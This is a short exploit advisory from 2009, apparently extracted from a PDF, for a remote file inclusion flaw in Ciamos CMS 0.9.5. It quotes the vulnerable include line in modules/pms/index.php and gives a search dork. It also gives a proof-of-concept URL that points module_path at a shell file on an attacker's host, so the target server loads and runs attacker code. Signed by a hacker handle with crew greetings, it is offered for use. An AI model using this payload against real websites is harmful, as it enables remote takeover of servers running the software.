Ciamos CMS 0.9.5 module_path Remote File Inclusion Vulnerability.pdf

1 [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ] 2 3 ######################################################################## 4 #Ciamos CMS <= 0.9.5 (module_path) Remote File Include Vulnerability 5 #Download Script : http://sourceforge.net/projects/ciamosmodules/files/ 6 #Dork : die("Hacking attempt"); :D 7 ######################################################################## 8 # 9 #Vuln : ./ciamos/modules/pms/index.php (line 13) 10 # <?php 11 # include_once($module_path.’include/header.php’); 12 # ?> 13 #PoC : http://server/modules/pms/index.php?module_path=http://[attacker]/shell.txt??? 14 # 15 ######################################################################## 16 ######################################################################## 17 ####################[90r0nt4l0 und3r9r0nd c0mmun1ty]#################### 18 ######################################################################## 19 ######################################################################## 20 21 22 23 [ Gorontalo / 2009 ] Page 1/1 Ciamos CMS 0.9.5 module_path Remote File Inclusion Vulnerability cr4wl3r 12/01/2009